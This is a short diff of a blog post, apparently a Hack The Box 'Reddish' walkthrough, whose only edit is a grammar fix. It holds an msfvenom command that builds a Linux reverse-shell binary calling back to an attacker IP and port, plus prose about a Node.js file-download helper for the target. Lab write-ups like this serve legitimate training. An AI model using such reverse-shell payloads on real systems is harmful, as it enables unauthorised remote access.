limbernie/limbernie.github.io/_posts/2019-01-27-reddish-htb-walkthrough.md

 # msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.13.52 LPORT=9999 -f elf -o rev
 ```

 Next, I've to find a more efficient way of transferring files over to the remote target.
-To that end, I wrote a `wget` utility in Node.js since `node` and the `request` module are available.
+To that end, I wrote a `wget` utility in Node.js since `node` and the `request` modules are available.
 The script has two arguments: the first argument is the download URL and the second argument is the path to save the file.

 <div class="filename"><span>wget.js</span></div>